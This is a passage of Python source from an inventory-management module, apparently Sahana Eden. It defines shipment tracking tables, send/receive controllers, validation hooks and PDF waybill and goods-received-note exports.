orderby="inv_inv_item.id",
sort=True)),
script = '''
$.filterOptionsS3({
'trigger':'send_inv_item_id',
'target':'item_pack_id',
'lookupResource':'item_pack',
'lookupPrefix':'supply',
'lookupURL':S3.Ap.concat('/inv/inv_item_packs/'),
'msgNoRecords':i18n.no_packs,
'fncPrep':S3.supply.fncPrepItem,
'fncRepresent':S3.supply.fncRepresentItem
})'''),
item_id(ondelete = "RESTRICT"),
item_pack_id(ondelete = "SET NULL"),
# Now done as a VirtualField instead (looks better & updates closer to real-time, so less of a race condition)
#Field("req_quantity", "double",
# # This isn't the Quantity requested, but rather the quantity still needed
# label = T("Quantity Needed"),
# readable = False,
# writable = False),
Field("quantity", "double", notnull=True,
label = T("Quantity Sent"),
requires = IS_NOT_EMPTY()),
Field("recv_quantity", "double",
label = T("Quantity Received"),
represent = self.qnty_recv_repr,
readable = False,
writable = False),
Field("return_quantity", "double",
label = T("Quantity Returned"),
represent = self.qnty_recv_repr,
readable = False,
writable = False),
Field("pack_value", "double",
label = T("Value per Pack")),
s3_currency(),
s3_date("expiry_date",
label = T("Expiry Date")),
# The bin at origin
Field("bin", length=16,
label = T("Bin"),
represent = s3_string_represent),
inv_item_id(name="recv_inv_item_id",
label = T("Receiving Inventory"),
required = False,
readable = False,
writable = False,
ondelete = "RESTRICT"),
# The bin at destination
Field("recv_bin", length=16,
label = T("Add to Bin"),
readable = False,
writable = False,
represent = s3_string_represent,
widget = S3InvBinWidget("inv_track_item"),
comment = DIV(_class="tooltip",
_title="%s|%s" % \
(T("Bin"),
T("The Bin in which the Item is being stored (optional)."))),
),
Field("item_source_no", "string", length=16,
label = self.inv_itn_label,
represent = s3_string_represent),
# original donating org
organisation_id(name = "supply_org_id",
label = T("Supplier/Donor"),
ondelete = "SET NULL"),
# which org owns this item
organisation_id(name = "owner_org_id",
label = T("Owned By (Organization/Branch)"),
ondelete = "SET NULL"),
Field("inv_item_status", "integer",
label = T("Item Status"),
requires = IS_EMPTY_OR(
IS_IN_SET(inv_item_status_opts)
),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
default = 0,),
Field("status", "integer",
label = T("Item Tracking Status"),
required = True,
requires = IS_IN_SET(tracking_status),
default = 1,
represent = lambda opt: tracking_status[opt],
writable = False),
self.inv_adj_item_id(ondelete = "RESTRICT"), # any adjustment record
# send record
send_id(),
# receive record
recv_id(),
req_item_id(readable=False,
writable=False),
Field.Method("total_value",
self.inv_track_item_total_value),
Field.Method("pack_quantity",
self.supply_item_pack_quantity(tablename=tablename)),
s3_comments(),
*s3_meta_fields()
)
# CRUD strings
ADD_TRACK_ITEM = T("Add Item to Shipment")
crud_strings[tablename] = Storage(
label_create = ADD_TRACK_ITEM,
title_display = T("Shipment Item Details"),
title_list = T("Shipment Items"),
title_update = T("Edit Shipment Item"),
label_list_button = T("List Shipment Items"),
label_delete_button = T("Delete Shipment Item"),
msg_record_created = T("Item Added to Shipment"),
msg_record_modified = T("Shipment Item updated"),
msg_record_deleted = T("Shipment Item deleted"),
msg_list_empty = T("No Shipment Items"))
# Filter Widgets
filter_widgets = [
S3TextFilter(["item_id$name",
"send_id$site_id$name",
"recv_id$site_id$name",
],
label = T("Search"),
#comment = recv_search_comment,
),
S3DateFilter("send_id$date",
label = T("Sent date"),
hidden = True,
),
S3DateFilter("recv_id$date",
label = T("Received date"),
hidden = True,
),
]
# Resource configuration
configure(tablename,
list_fields = ["id",
"status",
"item_id",
(T("Weight (kg)"), "item_id$weight"),
(T("Volume (m3)"), "item_id$volume"),
"item_pack_id",
"send_id",
"recv_id",
"quantity",
"currency",
"pack_value",
"bin",
"return_quantity",
"recv_quantity",
"recv_bin",
"owner_org_id",
"supply_org_id",
],
filter_widgets = filter_widgets,
onaccept = self.inv_track_item_onaccept,
onvalidation = self.inv_track_item_onvalidate,
extra_fields = ["quantity", "pack_value", "item_pack_id"],
)
#---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(inv_send_controller = self.inv_send_controller,
inv_send_onaccept = self.inv_send_onaccept,
inv_send_process = self.inv_send_process,
inv_track_item_deleting = self.inv_track_item_deleting,
inv_track_item_onaccept = self.inv_track_item_onaccept,
)
# ---------------------------------------------------------------------
@staticmethod
def inv_track_item_total_value(row):
""" Total value of a track item """
if hasattr(row, "inv_track_item"):
row = row.inv_track_item
try:
v = row.quantity * row.pack_value
return v
except:
# not available
return current.messages["NONE"]
# ---------------------------------------------------------------------
@staticmethod
def inv_track_item_quantity_needed(row):
"""
Quantity still needed for a track item - used in Inv Send
when an Item has come from a Request
"""
if hasattr(row, "inv_track_item"):
row = row.inv_track_item
try:
req_item_id = row.req_item_id
except:
# not available
req_item_id = None
if not req_item_id:
return current.messages["NONE"]
s3db = current.s3db
ritable = s3db.req_req_item
siptable = s3db.supply_item_pack
query = (ritable.id == req_item_id) & \
(ritable.item_pack_id == siptable.id)
row = current.db(query).select(ritable.quantity,
ritable.quantity_transit,
ritable.quantity_fulfil,
siptable.quantity).first()
if row:
rim = row.req_req_item
quantity_shipped = max(rim.quantity_transit,
rim.quantity_fulfil)
quantity_needed = (rim.quantity - quantity_shipped) * \
row.supply_item_pack.quantity
else:
return current.messages["NONE"]
return quantity_needed
# ---------------------------------------------------------------------
@staticmethod
def inv_send_represent(id, row=None, show_link=True):
"""
Represent a Sent Shipment
"""
if row:
id = row.id
table = current.db.inv_send
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_send
row = db(table.id == id).select(table.date,
table.send_ref,
table.to_site_id,
limitby=(0, 1)).first()
try:
send_ref_string = table.send_ref.represent(row.send_ref,
show_link=False)
to_string = table.to_site_id.represent(row.to_site_id,
show_link=False)
date_string = table.date.represent(row.date)
T = current.T
represent = "%s (%s: %s %s %s)" % (send_ref_string,
T("To"),
to_string,
T("on"),
date_string)
if show_link:
return A(represent,
_href = URL(c="inv", f="send", args=[id]))
else:
return represent
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def inv_send_onaccept(form):
"""
            When an inv_send record is created, create the send_ref.
"""
db = current.db
vars = form.vars
id = vars.id
type = vars.type
if type:
# Add all inv_items with status matching the send shipment type
# eg. Items for Dump, Sale, Reject, Surplus
inv_track_item_onaccept = current.s3db.inv_track_item_onaccept
site_id = vars.site_id
itable = db.inv_inv_item
tracktable = db.inv_track_item
query = (itable.site_id == site_id) & \
(itable.status == int(type))
rows = db(query).select()
for row in rows:
if row.quantity != 0:
# Insert inv_item to inv_track_item
inv_track_id = tracktable.insert(send_id = id,
send_inv_item_id = row.id,
item_id = row.item_id,
quantity = row.quantity,
currency = row.currency,
pack_value = row.pack_value,
expiry_date = row.expiry_date,
owner_org_id = row.owner_org_id,
supply_org_id = row.supply_org_id,
item_source_no = row.item_source_no,
item_pack_id = row.item_pack_id,
inv_item_status = row.status,
#status = TRACK_STATUS_PREPARING,
)
# Construct form.vars for inv_track_item_onaccept
vars = Storage()
vars.id = inv_track_id
vars.quantity = row.quantity
vars.item_pack_id = row.item_pack_id
vars.send_inv_item_id = row.id
# Call inv_track_item_onaccept to remove inv_item from stock
inv_track_item_onaccept(Storage(vars=vars))
stable = db.inv_send
# If the send_ref is None then set it up
record = stable[id]
if not record.send_ref:
code = current.s3db.supply_get_shipping_code(
current.deployment_settings.get_inv_send_shortname(),
record.site_id,
stable.send_ref,
)
db(stable.id == id).update(send_ref=code)
# -------------------------------------------------------------------------
@classmethod
def inv_send_controller(cls):
"""
RESTful CRUD controller for inv_send
"""
T = current.T
db = current.db
s3db = current.s3db
sendtable = s3db.inv_send
tracktable = s3db.inv_track_item
request = current.request
response = current.response
s3 = response.s3
# Limit site_id to sites the user has permissions for
error_msg = T("You do not have permission for any facility to send a shipment.")
current.auth.permitted_facilities(table=sendtable, error_msg=error_msg)
# Set Validator for checking against the number of items in the warehouse
vars = request.vars
send_inv_item_id = vars.send_inv_item_id
if send_inv_item_id:
if not vars.item_pack_id:
iitable = s3db.inv_inv_item
vars.item_pack_id = db(iitable.id == send_inv_item_id).select(iitable.item_pack_id,
limitby=(0, 1)
).first().item_pack_id
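            # QUANTITY_INV_ITEM (defined elsewhere in this module) is assumed
            # to cap the entered quantity at what is actually available for
            # the selected stock item and pack.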
s3db.inv_track_item.quantity.requires = QUANTITY_INV_ITEM(db,
send_inv_item_id,
vars.item_pack_id)
def set_send_attr(status):
sendtable.send_ref.writable = False
if status == SHIP_STATUS_IN_PROCESS:
sendtable.send_ref.readable = False
else:
                # Make all fields read-only
for field in sendtable.fields:
sendtable[field].writable = False
def set_track_attr(status):
            # By default, make all fields read-only
for field in tracktable.fields:
tracktable[field].writable = False
# Hide some fields
tracktable.send_id.readable = False
tracktable.recv_id.readable = False
tracktable.bin.readable = False
tracktable.item_id.readable = False
tracktable.recv_quantity.readable = False
tracktable.return_quantity.readable = False
tracktable.expiry_date.readable = False
tracktable.owner_org_id.readable = False
tracktable.supply_org_id.readable = False
tracktable.adj_item_id.readable = False
if status == TRACK_STATUS_PREPARING:
# show some fields
tracktable.send_inv_item_id.writable = True
tracktable.item_pack_id.writable = True
tracktable.quantity.writable = True
#tracktable.req_quantity.readable = True
tracktable.comments.writable = True
# hide some fields
tracktable.currency.readable = False
tracktable.pack_value.readable = False
tracktable.item_source_no.readable = False
tracktable.inv_item_status.readable = False
elif status == TRACK_STATUS_ARRIVED:
# Shipment arrived display some extra fields at the destination
tracktable.item_source_no.readable = True
tracktable.recv_quantity.readable = True
tracktable.return_quantity.readable = True
tracktable.recv_bin.readable = True
tracktable.currency.readable = True
tracktable.pack_value.readable = True
elif status == TRACK_STATUS_RETURNING:
tracktable.return_quantity.readable = True
tracktable.return_quantity.writable = True
tracktable.currency.readable = True
tracktable.pack_value.readable = True
def prep(r):
# Default to the Search tab in the location selector
s3.gis.tab = "search"
record = db(sendtable.id == r.id).select(sendtable.status,
sendtable.req_ref,
limitby=(0, 1)
).first()
if record:
status = record.status
if status != SHIP_STATUS_IN_PROCESS:
# Now that the shipment has been sent,
# lock the record so that it can't be meddled with
s3db.configure("inv_send",
create=False,
listadd=False,
editable=False,
deletable=False,
)
if r.component:
record = r.record
values = current.deployment_settings.get_inv_track_pack_values()
if status in (SHIP_STATUS_RECEIVED, SHIP_STATUS_CANCEL):
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"bin",
"quantity",
"recv_quantity",
"return_quantity",
"owner_org_id",
"supply_org_id",
"inv_item_status",
"comments",
]
if values:
list_fields.insert(7, "pack_value")
list_fields.insert(7, "currency")
elif status == SHIP_STATUS_RETURNING:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"return_quantity",
"bin",
"owner_org_id",
"supply_org_id",
"inv_item_status",
]
if values:
list_fields.insert(5, "pack_value")
list_fields.insert(5, "currency")
else:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"bin",
"owner_org_id",
"supply_org_id",
"inv_item_status",
]
if values:
list_fields.insert(6, "pack_value")
list_fields.insert(6, "currency")
if record.req_ref and r.interactive:
s3db.configure("inv_track_item",
extra_fields = ["req_item_id"])
tracktable.quantity_needed = \
Field.Method("quantity_needed",
cls.inv_track_item_quantity_needed)
list_fields.insert(4, (T("Quantity Needed"),
"quantity_needed"))
s3db.configure("inv_track_item", list_fields=list_fields)
# Can only create or delete track items for a send record if the status is preparing
method = r.method
if method in ("create", "delete"):
if status != SHIP_STATUS_IN_PROCESS:
return False
if method == "delete":
return s3.inv_track_item_deleting(r.component_id)
if record.get("site_id"):
# Restrict to items from this facility only
tracktable.send_inv_item_id.requires = IS_ONE_OF(db, "inv_inv_item.id",
s3db.inv_item_represent,
filterby = "site_id",
filter_opts = (record.site_id,),
not_filterby = "quantity",
not_filter_opts = (0,),
orderby = "inv_inv_item.id",
sort = True,
)
# Hide the values that will be copied from the inv_inv_item record
if r.component_id:
track_record = db(tracktable.id == r.component_id).select(tracktable.req_item_id,
tracktable.send_inv_item_id,
tracktable.item_pack_id,
tracktable.status,
tracktable.quantity,
limitby=(0, 1)).first()
set_track_attr(track_record.status)
# If the track record is linked to a request item then
# the stock item has already been selected so make it read only
if track_record and track_record.get("req_item_id"):
tracktable.send_inv_item_id.writable = False
tracktable.item_pack_id.writable = False
stock_qnty = track_record.quantity
tracktable.quantity.comment = T("%(quantity)s in stock") % dict(quantity=stock_qnty)
tracktable.quantity.requires = QUANTITY_INV_ITEM(db,
track_record.send_inv_item_id,
track_record.item_pack_id)
# Hide the item id
tracktable.item_id.readable = False
else:
set_track_attr(TRACK_STATUS_PREPARING)
if r.interactive:
crud_strings = s3.crud_strings.inv_send
if record.status == SHIP_STATUS_IN_PROCESS:
crud_strings.title_update = \
crud_strings.title_display = T("Process Shipment to Send")
elif "site_id" in request.vars and status == SHIP_STATUS_SENT:
crud_strings.title_update = \
crud_strings.title_display = T("Review Incoming Shipment to Receive")
else:
if r.id and request.get_vars.get("received", None):
# "received" must not propagate:
del request.get_vars["received"]
# Set the items to being received
# @ToDo: Check Permissions & Avoid DB updates in GETs
db(sendtable.id == r.id).update(status = SHIP_STATUS_RECEIVED)
db(tracktable.send_id == r.id).update(status = TRACK_STATUS_ARRIVED)
req_ref = record.req_ref
if req_ref:
# Update the Request Status
rtable = s3db.req_req
req_id = db(rtable.req_ref == req_ref).select(rtable.id,
limitby=(0, 1)).first()
# Get the full list of items in the request
ritable = s3db.req_req_item
query = (ritable.req_id == req_id) & \
(ritable.deleted == False)
ritems = db(query).select(ritable.id,
ritable.item_pack_id,
ritable.quantity,
# Virtual Field
#ritable.pack_quantity,
)
# Get all Received Shipments in-system for this request
query = (sendtable.status == SHIP_STATUS_RECEIVED) & \
(sendtable.req_ref == req_ref) & \
(tracktable.send_id == r.id) & \
(tracktable.deleted == False)
sitems = db(query).select(tracktable.item_pack_id,
tracktable.quantity,
# Virtual Field
#tracktable.pack_quantity,
)
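                                    # Aggregate the received quantities per
                                    # pack type and write them into
                                    # quantity_fulfil on the matching request
                                    # items; the final value of "complete"
                                    # comes from the last request item that
                                    # had received stock.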
fulfil_qty = {}
for item in sitems:
item_pack_id = item.item_pack_id
if item_pack_id in fulfil_qty:
fulfil_qty[item_pack_id] += (item.quantity * item.pack_quantity())
else:
fulfil_qty[item_pack_id] = (item.quantity * item.pack_quantity())
complete = False
for item in ritems:
if item.item_pack_id in fulfil_qty:
quantity_fulfil = fulfil_qty[item.item_pack_id]
db(ritable.id == item.id).update(quantity_fulfil=quantity_fulfil)
req_quantity = item.quantity * item.pack_quantity()
if quantity_fulfil >= req_quantity:
complete = True
else:
complete = False
# Update overall Request Status
if complete:
# REQ_STATUS_COMPLETE
db(rtable.id == req_id).update(fulfil_status=2)
else:
# REQ_STATUS_PARTIAL
db(rtable.id == req_id).update(fulfil_status=1)
response.confirmation = T("Shipment received")
# else set the inv_send attributes
elif r.id:
record = db(sendtable.id == r.id).select(sendtable.status,
limitby=(0, 1)).first()
set_send_attr(record.status)
else:
set_send_attr(SHIP_STATUS_IN_PROCESS)
sendtable.send_ref.readable = False
return True
args = request.args
if len(args) > 1 and args[1] == "track_item":
            # Shouldn't fail, but if the user enters the send id manually
            # it could, so wrap in a try
            try:
                status = db(sendtable.id == args[0]).select(sendtable.status,
                                                            limitby=(0, 1)
                                                            ).first().status
except:
status = None
if status:
editable = False
if status == SHIP_STATUS_RETURNING:
editable = True
# remove CRUD generated buttons in the tabs
s3db.configure("inv_track_item",
create = False,
deletable = False,
editable = editable,
listadd = False,
)
s3.prep = prep
output = current.rest_controller("inv", "send",
rheader = inv_send_rheader)
return output
# ---------------------------------------------------------------------
@staticmethod
def inv_send_process():
"""
Process a Shipment
"""
request = current.request
try:
send_id = request.args[0]
except:
redirect(URL(f="send"))
T = current.T
auth = current.auth
db = current.db
s3db = current.s3db
stable = db.inv_send
session = current.session
if not auth.s3_has_permission("update", stable, record_id=send_id):
session.error = T("You do not have permission to send this shipment.")
send_record = db(stable.id == send_id).select(stable.status,
stable.sender_id,
stable.send_ref,
stable.req_ref,
stable.site_id,
stable.delivery_date,
stable.recipient_id,
stable.to_site_id,
stable.comments,
limitby=(0, 1)).first()
if send_record.status != SHIP_STATUS_IN_PROCESS:
session.error = T("This shipment has already been sent.")
tracktable = db.inv_track_item
siptable = s3db.supply_item_pack
rrtable = s3db.req_req
ritable = s3db.req_req_item
# Get the track items that are part of this shipment
query = (tracktable.send_id == send_id ) & \
(tracktable.deleted == False)
track_items = db(query).select(tracktable.req_item_id,
tracktable.quantity,
tracktable.item_pack_id)
if not track_items:
session.error = T("No items have been selected for shipping.")
if session.error:
redirect(URL(f = "send",
args = [send_id]))
# Update Send record & lock for editing
system_roles = auth.get_system_roles()
ADMIN = system_roles.ADMIN
db(stable.id == send_id).update(date = request.utcnow,
status = SHIP_STATUS_SENT,
owned_by_user = None,
owned_by_group = ADMIN)
# If this is linked to a request then update the quantity in transit
req_ref = send_record.req_ref
req_rec = db(rrtable.req_ref == req_ref).select(rrtable.id,
limitby=(0, 1)).first()
if req_rec:
req_id = req_rec.id
for track_item in track_items:
req_item_id = track_item.req_item_id
if req_item_id:
req_pack_id = db(ritable.id == req_item_id).select(ritable.item_pack_id,
limitby=(0, 1)
).first().item_pack_id
req_p_qnty = db(siptable.id == req_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
t_qnty = track_item.quantity
t_pack_id = track_item.item_pack_id
inv_p_qnty = db(siptable.id == t_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
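                    # Convert the sent quantity into request-pack units; e.g.
                    # (illustrative) 6 sent packs of 5 units against a
                    # requested pack size of 10 adds 6 * 5 / 10 = 3 to
                    # quantity_transit.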
transit_quantity = t_qnty * inv_p_qnty / req_p_qnty
db(ritable.id == req_item_id).update(quantity_transit = ritable.quantity_transit + transit_quantity)
s3db.req_update_status(req_id)
# Create a Receive record
rtable = s3db.inv_recv
recv_id = rtable.insert(sender_id = send_record.sender_id,
send_ref = send_record.send_ref,
req_ref = req_ref,
from_site_id = send_record.site_id,
eta = send_record.delivery_date,
recipient_id = send_record.recipient_id,
site_id = send_record.to_site_id,
comments = send_record.comments,
status = SHIP_STATUS_SENT,
type = 1, # 1:"Another Inventory"
)
# Change the status for all track items in this shipment to In transit
# and link to the receive record
        db(tracktable.send_id == send_id).update(status = TRACK_STATUS_TRANSIT,
recv_id = recv_id)
session.confirmation = T("Shipment Items sent from Warehouse")
if req_rec:
session.confirmation = T("Request Status updated")
redirect(URL(f = "send",
args = [send_id, "track_item"]))
# ---------------------------------------------------------------------
@staticmethod
def inv_send_form(r, **attr):
"""
Generate a PDF of a Waybill
"""
db = current.db
table = db.inv_send
tracktable = db.inv_track_item
table.date.readable = True
record = db(table.id == r.id).select(table.send_ref,
limitby=(0, 1)).first()
send_ref = record.send_ref
# hide the inv_item field
tracktable.send_inv_item_id.readable = False
tracktable.recv_inv_item_id.readable = False
T = current.T
list_fields = [(T("Item Code"), "item_id$code"),
"item_id",
(T("Weight (kg)"), "item_id$weight"),
(T("Volume (m3)"), "item_id$volume"),
"bin",
"item_source_no",
"item_pack_id",
"quantity",
]
settings = current.deployment_settings
if r.record.req_ref:
# This Shipment relates to a request
# - show the req_item comments
list_fields.append("req_item_id$comments")
if settings.get_inv_track_pack_values():
list_fields + ["currency",
"pack_value",
]
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "list",
pdf_componentname = "track_item",
pdf_title = settings.get_inv_send_form_name(),
pdf_filename = send_ref,
list_fields = list_fields,
pdf_hide_comments = True,
pdf_header_padding = 12,
pdf_footer = inv_send_pdf_footer,
pdf_paper_alignment = "Landscape",
pdf_table_autogrow = "B",
**attr
)
# ---------------------------------------------------------------------
@staticmethod
def inv_recv_represent(id, row=None, show_link=True):
"""
Represent a Received Shipment
"""
if row:
id = row.id
table = current.db.inv_recv
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_recv
row = db(table.id == id).select(table.date,
table.recv_ref,
table.from_site_id,
table.organisation_id,
limitby=(0, 1)).first()
recv_ref_string = table.send_ref.represent(row.recv_ref,
show_link=False)
if row.from_site_id:
from_string = table.from_site_id.represent(row.from_site_id,
show_link=False)
else:
from_string = table.organisation_id.represent(row.organisation_id,
show_link=False)
date_string = table.date.represent(row.date)
T = current.T
represent = "%s (%s: %s %s %s)" % (recv_ref_string,
T("From"),
from_string,
T("on"),
date_string)
if show_link:
return A(represent,
_href = URL(c="inv", f="recv", args=[id]))
else:
return represent
# -------------------------------------------------------------------------
@staticmethod
def inv_recv_onaccept(form):
"""
            When an inv_recv record is created, create the recv_ref.
"""
db = current.db
rtable = db.inv_recv
# If the recv_ref is None then set it up
id = form.vars.id
record = rtable[id]
if not record.recv_ref:
# AR Number
code = current.s3db.supply_get_shipping_code(
current.deployment_settings.get_inv_recv_shortname(),
record.site_id,
rtable.recv_ref,
)
db(rtable.id == id).update(recv_ref = code)
# -------------------------------------------------------------------------
@staticmethod
def inv_send_onvalidation(form):
"""
            Check that either organisation_id or to_site_id is filled in, according to the type
"""
vars = form.vars
if not vars.to_site_id and not vars.organisation_id:
error = current.T("Please enter a %(site)s OR an Organization") % \
dict(site=current.deployment_settings.get_org_site_label())
errors = form.errors
errors.to_site_id = error
errors.organisation_id = error
# -------------------------------------------------------------------------
@staticmethod
def inv_recv_onvalidation(form):
"""
            Check that either organisation_id or from_site_id is filled in, according to the type
@ToDo: lookup the type values from s3cfg.py instead of hardcoding it
"""
type = form.vars.type and int(form.vars.type)
if type == 11 and not form.vars.from_site_id:
# Internal Shipment needs from_site_id
form.errors.from_site_id = current.T("Please enter a %(site)s") % \
dict(site=current.deployment_settings.get_org_site_label())
if type >= 32 and not form.vars.organisation_id:
            # A shipment from an Organization/Supplier needs organisation_id
form.errors.organisation_id = current.T("Please enter an Organization/Supplier")
# ---------------------------------------------------------------------
@staticmethod
def inv_recv_form (r, **attr):
"""
Generate a PDF of a GRN (Goods Received Note)
"""
T = current.T
db = current.db
table = db.inv_recv
track_table = db.inv_track_item
table.date.readable = True
table.site_id.readable = True
track_table.recv_quantity.readable = True
table.site_id.label = T("By %(site)s") % dict(site=current.deployment_settings.get_inv_facility_label())
table.site_id.represent = current.s3db.org_site_represent
record = table[r.id]
recv_ref = record.recv_ref
list_fields = ["item_id",
(T("Weight (kg)"), "item_id$weight"),
(T("Volume (m3)"), "item_id$volume"),
"item_source_no",
"item_pack_id",
"quantity",
"recv_quantity",
"currency",
"pack_value",
"bin"
]
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "list",
pdf_title = T(current.deployment_settings.get_inv_recv_form_name()),
pdf_filename = recv_ref,
list_fields = list_fields,
pdf_hide_comments = True,
pdf_componentname = "track_item",
pdf_header_padding = 12,
pdf_footer = inv_recv_pdf_footer,
pdf_table_autogrow = "B",
pdf_paper_alignment = "Landscape",
**attr
)
# -------------------------------------------------------------------------
@staticmethod
def inv_recv_donation_cert (r, **attr):
"""
Generate a PDF of a Donation certificate
"""
db = current.db
table = db.inv_recv
table.date.readable = True
table.type.readable = False
field = table.site_id
field.readable = True
field.label = current.T("By %(site)s") % dict(site=current.deployment_settings.get_inv_facility_label())
field.represent = current.s3db.org_site_represent
record = table[r.id]
site_id = record.site_id
site = field.represent(site_id, False)
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request=r,
method="list",
pdf_title="Donation Certificate",
pdf_filename="DC-%s" % site,
pdf_hide_comments=True,
pdf_componentname = "track_item",
**attr
)
# -------------------------------------------------------------------------
@staticmethod
    def qnty_recv_repr(value):
        """
            Show missing/zero received quantities in bold
        """
        if value:
            return value
        else:
            return B(value)
# ---------------------------------------------------------------------
@staticmethod
def inv_send_ref_represent(value, show_link=True):
"""
Represent for the Tall Out number,
if show_link is True then it will generate a link to the pdf
"""
if value:
if show_link:
db = current.db
table = db.inv_send
row = db(table.send_ref == value).select(table.id,
limitby=(0, 1)).first()
if row:
return A(value,
_href = URL(c = "inv",
f = "send",
args = [row.id, "form"]
),
)
else:
return value
else:
return value
else:
return current.messages["NONE"]
# ---------------------------------------------------------------------
@staticmethod
def inv_recv_ref_represent(value, show_link=True):
"""
Represent for the Goods Received Note
if show_link is True then it will generate a link to the pdf
"""
if value:
if show_link:
db = current.db
table = db.inv_recv
recv_row = db(table.recv_ref == value).select(table.id,
limitby=(0, 1)).first()
return A(value,
_href = URL(c = "inv",
f = "recv",
args = [recv_row.id, "form"]
),
)
else:
return B(value)
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def inv_track_item_onvalidate(form):
"""
            When a track item record is being created with a tracking number
            then the tracking number needs to be unique within the organisation.
            If the inv. item is coming out of a warehouse then the inv. item
            details need to be copied across (org, expiry, etc.).
            If the inv. item is being received then there might be a selected
            bin; ensure that the correct bin is selected and save those details.
"""
vars = form.vars
send_inv_item_id = vars.send_inv_item_id
if send_inv_item_id:
# Copy the data from the sent inv_item
db = current.db
itable = db.inv_inv_item
query = (itable.id == send_inv_item_id)
record = db(query).select(limitby=(0, 1)).first()
vars.item_id = record.item_id
vars.item_source_no = record.item_source_no
vars.expiry_date = record.expiry_date
vars.bin = record.bin
vars.owner_org_id = record.owner_org_id
vars.supply_org_id = record.supply_org_id
vars.pack_value = record.pack_value
vars.currency = record.currency
vars.inv_item_status = record.status
# Save the organisation from where this tracking originates
stable = current.s3db.org_site
query = query & (itable.site_id == stable.id)
record = db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
vars.track_org_id = record.organisation_id
if not vars.recv_quantity:
# If we have no send_id and no recv_quantity then
# copy the quantity sent directly into the received field
# This is for when there is no related send record
# The Quantity received ALWAYS defaults to the quantity sent
# (Please do not change this unless there is a specific user requirement)
#db.inv_track_item.recv_quantity.default = form.vars.quantity
vars.recv_quantity = vars.quantity
        recv_bin = vars.recv_bin
        if recv_bin:
            # If there is a receiving bin then select the right one
            # and save it back into the form vars
            if isinstance(recv_bin, list):
                if recv_bin[1] != "":
                    recv_bin = recv_bin[1]
                else:
                    recv_bin = recv_bin[0]
                vars.recv_bin = recv_bin
        return
# -------------------------------------------------------------------------
@staticmethod
def inv_kit_onvalidate(form):
"""
Check that we have sufficient inv_item in stock to build the kits
"""
vars = form.vars
db = current.db
s3db = current.s3db
ktable = s3db.supply_kit_item
ptable = db.supply_item_pack
invtable = db.inv_inv_item
# The Facility at which we're building these kits
squery = (invtable.site_id == vars.site_id)
# Get contents of this kit
query = (ktable.parent_item_id == vars.item_id)
rows = db(query).select(ktable.item_id,
ktable.quantity,
ktable.item_pack_id)
quantity = vars.quantity
        max_kits = None
# @ToDo: Save the results for the onaccept
#items = {}
# Loop through each supply_item in the kit
for record in rows:
# How much of this supply_item is required per kit?
one_kit = record.quantity * ptable[record.item_pack_id].quantity
# How much of this supply_item do we have in stock?
stock_amount = 0
query = squery & (invtable.item_id == record.item_id)
wh_items = db(query).select(invtable.quantity,
invtable.item_pack_id)
for wh_item in wh_items:
amount = wh_item.quantity * ptable[wh_item.item_pack_id].quantity
stock_amount += amount
            # How many Kits can we create from this component?
            kits = stock_amount / one_kit
            # The scarcest component limits the number of kits
            if max_kits is None or kits < max_kits:
                max_kits = kits
# @ToDo: Save the results for the onaccept
        if max_kits is None or max_kits < quantity:
            form.errors.quantity = current.T("You can only make %d kit(s) with the available stock") % \
                                   int(max_kits or 0)
return
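        # Worked example (hypothetical figures): a kit that needs 2x item A and
        # 5x item B, at a site holding 20x A and 30x B (after pack conversion),
        # allows min(20 / 2, 30 / 5) = 6 kits, so requesting 10 kits would
        # trigger the validation error above.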
# -------------------------------------------------------------------------
@staticmethod
def inv_kit_onaccept(form):
"""
Reduce the Inventory stocks by the amounts used to make the kits
- pick items which have an earlier expiry_date where they have them
- provide a pick list to ensure that the right stock items are used
to build the kits: inv_kit_item
"""
# @ToDo
return
# -------------------------------------------------------------------------
@staticmethod
def inv_track_item_onaccept(form):
"""
When a track item record is created and it is linked to an inv_item
then the inv_item quantity will be reduced.
"""
db = current.db
s3db = current.s3db
tracktable = db.inv_track_item
inv_item_table = db.inv_inv_item
stable = db.inv_send
rtable = db.inv_recv
siptable = db.supply_item_pack
supply_item_add = s3db.supply_item_add
form_vars = form.vars
id = form_vars.id
record = form.record
if form_vars.send_inv_item_id:
stock_item = db(inv_item_table.id == form_vars.send_inv_item_id).select(inv_item_table.id,
inv_item_table.quantity,
inv_item_table.item_pack_id,
limitby=(0, 1)).first()
elif record:
stock_item = record.send_inv_item_id
else:
# will get here for a recv (from external donor / local supplier)
stock_item = None
# Modify the original inv. item total only if we have a quantity on the form
# and a stock item to take it from.
# There will not be a quantity if it is being received since by then it is read only
# It will be there on an import and so the value will be deducted correctly
if form_vars.quantity and stock_item:
stock_quantity = stock_item.quantity
stock_pack = db(siptable.id == stock_item.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
if record:
if record.send_inv_item_id != None:
# Items have already been removed from stock, so first put them back
old_track_pack_quantity = db(siptable.id == record.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
stock_quantity = supply_item_add(stock_quantity,
stock_pack,
record.quantity,
old_track_pack_quantity
)
try:
new_track_pack_quantity = db(siptable.id == form_vars.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
except:
new_track_pack_quantity = record.item_pack_id.quantity
newTotal = supply_item_add(stock_quantity,
stock_pack,
- float(form_vars.quantity),
new_track_pack_quantity
)
db(inv_item_table.id == stock_item).update(quantity = newTotal)
if form_vars.send_id and form_vars.recv_id:
send_ref = db(stable.id == form_vars.send_id).select(stable.send_ref,
limitby=(0, 1)
).first().send_ref
db(rtable.id == form_vars.recv_id).update(send_ref = send_ref)
